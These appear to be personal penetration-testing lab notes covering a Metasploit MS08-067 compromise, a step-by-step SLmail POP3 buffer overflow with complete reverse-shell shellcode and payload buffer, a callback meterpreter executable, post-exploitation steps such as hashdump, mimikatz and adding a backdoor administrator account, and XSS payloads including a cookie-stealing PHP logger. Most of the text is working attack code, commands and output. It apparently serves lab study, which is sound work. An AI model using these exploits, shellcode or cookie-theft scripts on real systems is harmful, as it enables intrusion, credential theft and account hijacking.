exploitation
metasploit
exploit/windows/smb/ms08_067_netapi
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > set rhost 10.11.1.5
rhost => 10.11.1.5
msf exploit(ms08_067_netapi) > set lhost 10.11.0.81
lhost => 10.11.0.81
msf exploit(ms08_067_netapi) > options
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.11.0.81:4444
[*] 10.11.1.5:445 - Automatically detecting the target...
[*] 10.11.1.5:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:Unknown
[*] 10.11.1.5:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 10.11.1.5:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.11.1.5
[*] Meterpreter session 1 opened (10.11.0.81:4444 -> 10.11.1.5:2985) at 2018-02-06 12:29:12 -0500
#######################################################
from the command line:
searchsploit term
msfconsole
use 'search' to find exploits to use
use 'use' to bounce around various tools within metasploit
use 'show options' to see what is changeable
'show payloads' lets you know what can be sent
- set payload windows/meterpreter/reverse_tcp
- sets up a reverse tcp connection
use 'set' to define options
use 'run' when you are ready to shoot the exploit
####################################################
meterpreter
upon first contact
- 'getuid' to see who you are
- 'background' to background a session and use another exploit
- 'sessions -l' lists out active sessions
- 'sessions -i 1' to bring a backgrounded session back up
- '?' displays commands
to get away from a flaky process
- use 'ps' to list processes
- use 'migrate' to move to a more stable process
####################################################
search mimikatz
use post/windows/gather/credentials/sso
- when this is run, password for the windows machine will be returned
sessions -l lists open sessions
####################################################
use auxiliary/scanner/http/webdav_scanner
show options
use 'set' to define options
set RHOSTS 10.11.1.1-254
use 'run' when you are ready to shoot the exploit
use 'use' to bounce around various tools within metasploit
use 'search' to find exploits to use
search slmail
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/pop3/seattlelab_pass 2003-05-07 great Seattle Lab Mail 5.5 POP3 Buffer Overflow
use the 'Name' from above
use 'options' to see what is changeable
show payloads lets you know what can be sent
set payload windows/meterpreter/reverse_tcp
- sets up a reverse tcp connection
within meterpreter:
- getuid to find out who you are
- ? - displays commands
search mimikatz
use post/windows/gather/credentials/sso
sessions -l lists open sessions
buffer overflow
Buffer Overflow (slmail example):
1 - fuzzing
windows:
start slmail server
start Immunity Debugger (ID)
attach slmail to ID
let slmail run (hit the play button)
command:
python fuzzer.py
this will step through higher and higher values until slmail crashes
2 - recreate
windows:
detach slmail from ID
stop ID
stop slmail
start slmail
start ID
attach slmail to ID
let slmail run (hit the play button)
(chorus = this restart sequence; it is repeated before each step below)
command:
python slmail-pop3.py (with 2700 As in it)
this sends the same number of characters that the fuzzer crashed on
this will also serve as the baseline for the rest of the exploit work
3 - locate the EIP
windows:
chorus
command:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
creates a unique pattern:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9
replace the 2700 As with that pattern
python slmail-pop3.py
windows:
the EIP will now hold four consecutive bytes of that pattern; read them off as hex in ID
command:
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
results indicate exactly where the EIP resides (2606 in this case)
4 - test EIP location
windows:
chorus
command:
replace the special string with "A"*2606 + "B"*4 + "C"*90
where the As should lead up to the EIP, the Bs should fill the EIP, and the Cs should start right after
python slmail-pop3.py
windows:
the EIP should be 42424242
5 - test for exploit space
windows:
chorus
command:
replace the special string with "A"*2606 + "B"*4 + "C"*(3500-2606-4)
this will tell us how much space we have for an exploit. The 3500 could be higher or lower; this was just going for about 400 bytes, I think.
python slmail-pop3.py
if everything works the same, this length is good.
6 - test for bad characters
windows:
chorus
command:
replace the character strings with a bad character list:
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
python slmail-pop3.py
run this as often as needed to find all the bad characters (look in the ID bottom-left window), i.e. the characters that get mangled in memory and would break the exploit; remove each one found and resend until the whole list arrives intact
common bad characters include \x00, \x0a, and \x0d
7 - redirecting execution
windows:
chorus
in ID, type !mona modules
look for a module whose base address has no restricted characters and that shows False for ASLR and the other protections (the 4 falses); the last column can be True
then hit the "e" on the command bar to bring up executable modules
look for the .dll you found on the last page, double click it
in the top left window, right click
search for
command ==> jmp esp
sequence of commands ==> "push esp" "retn"
if these fail
hit "m" on the command bar
search down Owner column for .dll
command:
ruby /usr/share/metasploit-framework/tools/nasm_shell.rb
at the ruby prompt:
type "jmp esp"
returns
00000000 FFE4 jmp esp
windows:
!mona find -s "\xff\xe4" -m slmfc.dll
highlight the first line from the bottom of the page
0x5f4a358f in this case
click the button on the command bar with the long arrow pointing right
enter the hex from the top row in the box
8 - testing last step
windows:
chorus
command:
edit slmail-pop3.py:
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" +"C"*(3500-2606-4)
NOTICE the reversed hex (little-endian byte order)!!!!!!!!!!!!
windows:
set expression to follow...the original hex
this will let us know if the overflow will hit on that address
command:
python slmail-pop3.py
windows:
bottom of ID will show if program stopped at our breakpoint
chorus
9 - shellcode payload
command: windows/meterpreter/reverse_tcp??????
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.81 LPORT=443 -f c -a x86 --platform windows
but this outputs code with restricted characters
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of c file: 1386 bytes
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x0a\x0b\x00\x51\x68"
"\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.81 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes
unsigned char buf[] =
"\xbe\x35\x8d\xa2\xb0\xda\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x0e\x03\x47\x83\x40\x45\x5b\x73\x06"
"\xa6\xa3\x84\x67\x2e\x46\xb5\xa7\x54\x03\xe6\x17\x1e\x41\x0b"
"\xd3\x72\x71\x98\x91\x5a\x76\x29\x1f\xbd\xb9\xaa\x0c\xfd\xd8"
"\x28\x4f\xd2\x3a\x10\x80\x27\x3b\x55\xfd\xca\x69\x0e\x89\x79"
"\x9d\x3b\xc7\x41\x16\x77\xc9\xc1\xcb\xc0\xe8\xe0\x5a\x5a\xb3"
"\x22\x5d\x8f\xcf\x6a\x45\xcc\xea\x25\xfe\x26\x80\xb7\xd6\x76"
"\x69\x1b\x17\xb7\x98\x65\x50\x70\x43\x10\xa8\x82\xfe\x23\x6f"
"\xf8\x24\xa1\x6b\x5a\xae\x11\x57\x5a\x63\xc7\x1c\x50\xc8\x83"
"\x7a\x75\xcf\x40\xf1\x81\x44\x67\xd5\x03\x1e\x4c\xf1\x48\xc4"
"\xed\xa0\x34\xab\x12\xb2\x96\x14\xb7\xb9\x3b\x40\xca\xe0\x53"
"\xa5\xe7\x1a\xa4\xa1\x70\x69\x96\x6e\x2b\xe5\x9a\xe7\xf5\xf2"
"\xdd\xdd\x42\x6c\x20\xde\xb2\xa5\xe7\x8a\xe2\xdd\xce\xb2\x68"
"\x1d\xee\x66\x3e\x4d\x40\xd9\xff\x3d\x20\x89\x97\x57\xaf\xf6"
"\x88\x58\x65\x9f\x23\xa3\xee\xaa\xb8\xab\xbf\xc2\xbc\xab\x3e"
"\xa8\x48\x4d\x2a\xde\x1c\xc6\xc3\x47\x05\x9c\x72\x87\x93\xd9"
"\xb5\x03\x10\x1e\x7b\xe4\x5d\x0c\xec\x04\x28\x6e\xbb\x1b\x86"
"\x06\x27\x89\x4d\xd6\x2e\xb2\xd9\x81\x67\x04\x10\x47\x9a\x3f"
"\x8a\x75\x67\xd9\xf5\x3d\xbc\x1a\xfb\xbc\x31\x26\xdf\xae\x8f"
"\xa7\x5b\x9a\x5f\xfe\x35\x74\x26\xa8\xf7\x2e\xf0\x07\x5e\xa6"
"\x85\x6b\x61\xb0\x89\xa1\x17\x5c\x3b\x1c\x6e\x63\xf4\xc8\x66"
"\x1c\xe8\x68\x88\xf7\xa8\x99\xc3\x55\x98\x31\x8a\x0c\x98\x5f"
"\x2d\xfb\xdf\x59\xae\x09\xa0\x9d\xae\x78\xa5\xda\x68\x91\xd7"
"\x73\x1d\x95\x44\x73\x34";
edit slmail-pop3.py thusly:
shellcode = ("\xbe\x35\x8d\xa2\xb0\xda\xd0\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x72\x0e\x03\x47\x83\x40\x45\x5b\x73\x06"
"\xa6\xa3\x84\x67\x2e\x46\xb5\xa7\x54\x03\xe6\x17\x1e\x41\x0b"
"\xd3\x72\x71\x98\x91\x5a\x76\x29\x1f\xbd\xb9\xaa\x0c\xfd\xd8"
"\x28\x4f\xd2\x3a\x10\x80\x27\x3b\x55\xfd\xca\x69\x0e\x89\x79"
"\x9d\x3b\xc7\x41\x16\x77\xc9\xc1\xcb\xc0\xe8\xe0\x5a\x5a\xb3"
"\x22\x5d\x8f\xcf\x6a\x45\xcc\xea\x25\xfe\x26\x80\xb7\xd6\x76"
"\x69\x1b\x17\xb7\x98\x65\x50\x70\x43\x10\xa8\x82\xfe\x23\x6f"
"\xf8\x24\xa1\x6b\x5a\xae\x11\x57\x5a\x63\xc7\x1c\x50\xc8\x83"
"\x7a\x75\xcf\x40\xf1\x81\x44\x67\xd5\x03\x1e\x4c\xf1\x48\xc4"
"\xed\xa0\x34\xab\x12\xb2\x96\x14\xb7\xb9\x3b\x40\xca\xe0\x53"
"\xa5\xe7\x1a\xa4\xa1\x70\x69\x96\x6e\x2b\xe5\x9a\xe7\xf5\xf2"
"\xdd\xdd\x42\x6c\x20\xde\xb2\xa5\xe7\x8a\xe2\xdd\xce\xb2\x68"
"\x1d\xee\x66\x3e\x4d\x40\xd9\xff\x3d\x20\x89\x97\x57\xaf\xf6"
"\x88\x58\x65\x9f\x23\xa3\xee\xaa\xb8\xab\xbf\xc2\xbc\xab\x3e"
"\xa8\x48\x4d\x2a\xde\x1c\xc6\xc3\x47\x05\x9c\x72\x87\x93\xd9"
"\xb5\x03\x10\x1e\x7b\xe4\x5d\x0c\xec\x04\x28\x6e\xbb\x1b\x86"
"\x06\x27\x89\x4d\xd6\x2e\xb2\xd9\x81\x67\x04\x10\x47\x9a\x3f"
"\x8a\x75\x67\xd9\xf5\x3d\xbc\x1a\xfb\xbc\x31\x26\xdf\xae\x8f"
"\xa7\x5b\x9a\x5f\xfe\x35\x74\x26\xa8\xf7\x2e\xf0\x07\x5e\xa6"
"\x85\x6b\x61\xb0\x89\xa1\x17\x5c\x3b\x1c\x6e\x63\xf4\xc8\x66"
"\x1c\xe8\x68\x88\xf7\xa8\x99\xc3\x55\x98\x31\x8a\x0c\x98\x5f"
"\x2d\xfb\xdf\x59\xae\x09\xa0\x9d\xae\x78\xa5\xda\x68\x91\xd7"
"\x73\x1d\x95\x44\x73\x34")
buffer = "A"*2606 +"\x8f\x35\x4a\x5f" + "\x90"*16 + shellcode + "C"*(3500-2606-4-351-16)
i.e. As up to the EIP + return address (reversed) + 16-byte NOP sled + shellcode + padding out to the 3500 total
command:
nc -lvp 443
python slmail-pop3.py
get a shell??
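The offset and byte-order arithmetic behind steps 3, 8 and 9, as an added Python 3 example (not part of the original notes and not Metasploit's code): it rebuilds the pattern_create/pattern_offset logic and checks the numbers recorded above (EIP 39694438 -> offset 2606, 0x5f4a358f -> \x8f\x35\x4a\x5f, 3500-2606-4-351-16 = 523 bytes of padding).

```python
import string
import struct

# Character sets that produce the Metasploit-style cyclic pattern Aa0Aa1Aa2...Az9Ba0...
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Return the first `length` characters of the cyclic pattern used by
    pattern_create.rb: every 3-byte unit (upper, lower, digit) is unique, so any
    4 bytes read back out of a register map to exactly one position."""
    chunks = []
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                chunks.append(u + l + d)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    raise ValueError("pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip_hex, length=2700):
    """Mirror of pattern_offset.rb -q: the debugger shows EIP as a little-endian
    32-bit value, so the 4 bytes are reversed before searching the pattern.
    Returns -1 when the value did not come from the pattern at all."""
    register_bytes = bytes.fromhex(eip_hex)
    try:
        needle = register_bytes[::-1].decode("ascii")
    except UnicodeDecodeError:
        return -1
    return pattern_create(length).find(needle)


def little_endian(address):
    """Pack a 32-bit address the way it has to appear in the buffer (the 'reversed
    hex' the notes warn about): 0x5f4a358f becomes b'\\x8f\\x35\\x4a\\x5f'."""
    return struct.pack("<I", address)


def padding_length(total, offset, shellcode_len, nop_sled=16, ret_len=4):
    """Trailing filler needed to keep the whole buffer at `total` bytes once the
    offset, return address, NOP sled and shellcode are accounted for."""
    remaining = total - offset - ret_len - nop_sled - shellcode_len
    if remaining < 0:
        raise ValueError("shellcode does not fit in the space measured in step 5")
    return remaining


if __name__ == "__main__":
    # Values from the notes: EIP read as 39694438, 2700-byte pattern,
    # 3500-byte buffer, 351-byte encoded payload, 16-byte NOP sled.
    print(pattern_offset("39694438"))       # 2606
    print(little_endian(0x5f4a358f))        # b'\x8f5J_', i.e. \x8f\x35\x4a\x5f
    print(padding_length(3500, 2606, 351))  # 523
```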
custom exe
step 1:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.81 LPORT=4444 -f exe -o shell_rev_4444.exe
- this makes the exe file
step 2:
mv shell_rev_4444.exe /var/www/html/shell_rev_4444.exe
- this moves the file to the internal webpage
apachectl start
- starts up the website
step 3:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.11.0.81
run
- this sets up the LP for the .exe to call back to
step 4:
go to the windows rig and download the .exe
run it
step 5:
the LP will react
getuid
getsystem
ps
migrate (to low PID like wininit.exe)
example 1
target_pc *.5
windows xp / 445
ms08-067 - exploit/windows/smb/ms08_067_netapi
once in the box:
search -f proof.txt
getuid
#ctrl-insert for screen shot
ps
ipconfig
netstat
systeminfo
1 shell
2 systeminfo
3 exit
hashdump
mimikatz
1 background meterpreter
2 search mimikatz
3 set its options (the session number)
4 run it
add account to log into target
1 shell
2 net user hacker P@ssword1234 /add
3 net localgroup administrators hacker /add
4 exit
rdesktop 10.11.1.5
- to log into target_pc
clean up afterwards
1 shell
2 net user hacker /delete
3 exit
web application attacks
WEB APPLICATION ATTACKS:
10.11.1.251
view page source:
<html>
<body style="background:#000000;color:#86DD1D">
<h1 style="text-align:center">s3@n</h1>
<h2 style="text-align:center">
<script>
var _0xfc44=["\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x77\x70\x2F\x6C\x6F\x67\x6F\x2E\x6A\x70\x67\x22","\x77\x72\x69\x74\x65"];document[_0xfc44[1]](_0xfc44[0]);
#######################################
<img src="wp/logo.jpg"write
^wordpress i suppose???
#######################################
</script>
</h2>
</body>
</html>
FUCK BURPSUITE.....SAME SAME
sqlmap??????????? GUESS I'LL FUCKING LEARN IT ON MY OWN
dbs
is-dba
tables
columns
PATH=
LIBRARY=
could be changable to something i wrote or whatnot
xss
XSS
Cross Site Scripting
<i> italics tag to see if it works
<script>alert("XSS")</script>
<script src="http://asite.com/myxss.js"></script>
<script>window.location='http://asite.com/myxss.js'</script>
#########################cookiemonster.php
<?php
if (isset($_GET['cookie']))
{
$file = 'stolenCookies.txt';
file_put_contents($file, $_GET['cookie'].PHP_EOL, FILE_APPEND);
}
?>
<!DOCTYPE html>
<html>
<title> XSS Tutorial #4</title>
<body>
<h1 align="center"> oh no something went wrong </h1>
</body>
</html>
########################
to use the above to redirect:
<script>window.location='http://localhost/xss/4/cookiemonster.php?cookie='+escape(document.cookie)</script>
to use above to hover attack:
<a href="http://www.youtube.com/" onmouseover="window.location='http://localhost/xss/4/cookiemonster.php?cookie='+escape(document.cookie)">then actual url</a>
########################
a forced comment:
http://localhost/xss/4/index.php?name=<script>window.unload=function(){document.getElementsByName('comment')[0].innerHTML='XSS is fun';document.getElementById('post').submit();}</script>
##############################
To avoid a basic filter:
<script>alert(String.fromCharCode(88,83,83))</script>
##############################
address bar scripts:
javascript:alert("hello")
##################################
<a href=javascript:alert(String.fromCharCode(88,83,83))>click me</a>
<a href=javascript:alert("XSS")>click me</a>
#######################################
ascii decimal encoded
javascript:alert('XSS')
javascript:alert('XSS')
OWASP's filter evasion cheat sheet!!!!!!
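The "basic filter" bypass above and the fix the notes leave implicit (encode output instead of blacklisting input), as an added Python 3 example that is not part of the original notes; the payload list is constructed from the lines above and the blacklist stands in for a typical signature filter.

```python
import html
import re

# Payloads quoted in the notes above, collected here as a constructed test list.
PAYLOADS = [
    '<i> italics tag to see if it works',
    '<script>alert("XSS")</script>',
    '<script>alert(String.fromCharCode(88,83,83))</script>',
    '<a href=javascript:alert("XSS")>click me</a>',
    "<script>window.location='http://localhost/xss/4/cookiemonster.php?cookie='+escape(document.cookie)</script>",
]

# Signatures a naive filter might strip: the literal test call, the literal
# javascript: scheme, and the cookie grab used by cookiemonster.php.
BLACKLIST = [
    re.compile(r"""alert\(['"]XSS['"]\)"""),
    re.compile(r"javascript:", re.IGNORECASE),
    re.compile(r"document\.cookie"),
]


def blacklist_filter(user_input):
    """A 'basic filter' of the kind the notes bypass: it deletes known-bad
    substrings and passes everything else through untouched."""
    for pattern in BLACKLIST:
        user_input = pattern.sub("", user_input)
    return user_input


def encode_for_html(user_input):
    """Output encoding for an HTML text or quoted-attribute context: < > & " '
    become entities, so whatever the payload spells out, the browser renders
    it as text instead of markup."""
    return html.escape(user_input, quote=True)


def evaluate(payloads=PAYLOADS):
    """For each payload report whether the blacklist left it intact (a bypass)
    and whether the encoded form still contains raw markup (it never should)."""
    report = {}
    for payload in payloads:
        filtered = blacklist_filter(payload)
        encoded = encode_for_html(payload)
        report[payload] = {
            "blacklist_bypassed": filtered == payload,
            "encoded_has_markup": any(ch in encoded for ch in '<>"'),
        }
    return report


if __name__ == "__main__":
    for payload, result in evaluate().items():
        print(f"{payload!r}: {result}")
```

The fromCharCode payload goes through the blacklist unchanged, which is the bypass the notes describe; the encoded form of every payload contains no markup at all.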
search for exploit
searchsploit (name of service to exploit.....example: slmail)
--------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
SLmail Pro 6.3.1.0 - Multiple Remote Denial | windows/dos/31563.txt
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/16399.rb
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' | windows/remote/638.py
